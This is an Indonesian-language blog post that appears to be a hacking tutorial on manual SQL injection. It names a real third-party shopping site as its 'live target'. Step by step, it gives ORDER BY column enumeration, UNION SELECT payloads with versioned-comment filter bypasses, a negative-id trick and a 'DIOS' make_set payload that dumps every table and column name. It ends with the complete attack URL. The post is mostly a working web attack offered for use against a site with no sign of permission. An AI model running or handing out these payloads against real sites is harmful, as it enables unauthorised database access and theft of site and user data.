Sedikit catatan, saya bukan master yg bisa segalanya, hanya ingin membagi ilmu yg saya punya selama ini.
Hal yg diperlukan
- Kuota
- Dios
Live Target
https://www.teddyhouse.com/help.php?id=2
• PoC
1. Cek dulu tu targetnya error atau ga dengan nambahin kutip atas (') di akhir parameter. (Lihat Screenshot)
Sebelum dikasih parameter
Habis itu kita cari column yg error nya dengan nambahin
+order+by+angka--+- (misal: +order+by+1--+-)
(Note : jika column ga ketemu error padahal udah sampe 100+ angka pake yg dibawah)
' order by angka-- - (misal: ' order by 1-- -)
' order by 1-- - (Web Normal)
' order by 2-- - (Web Normal)
' order by 3-- - (Web Normal)
' order by 4-- - (Web Normal)
Skip
' order by 14-- - (Web Normal)
' order by 15-- - (Web Normal)
' order by 16-- - (Web Error)
Note : Error seperti ditambah parameter
2. Tambahkan +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+-
atau
' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -
Nah, disini nih kadang ada yg tulisan 403 forbidden
Masukin union selectnya seperti ini
' /*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -
Ga muncul angka ajaibnya? Tambahin - (strip) di depan angka parameter.
Contoh :
Normal
index.php?id=2
Tambah -
index.php?id=-2
Sampai sini paham kan??
Nah, tinggal ganti aja tu angka error sama dios.
Nih diosnya.
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
Hasil akhirnya seperti ini.
Website
https://www.teddyhouse.com/help.php?id=-2%27%20/*!50000union*/%20/*!50000select*/%201,2,3,4,5,6,7,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),9,10,11,12,13,14,15--%20-
Screenshot
Ga paham sama tutor gajelas ini?
Hubungi saya brokuh click
Thanks for visit.
See you next blog.
0 Comments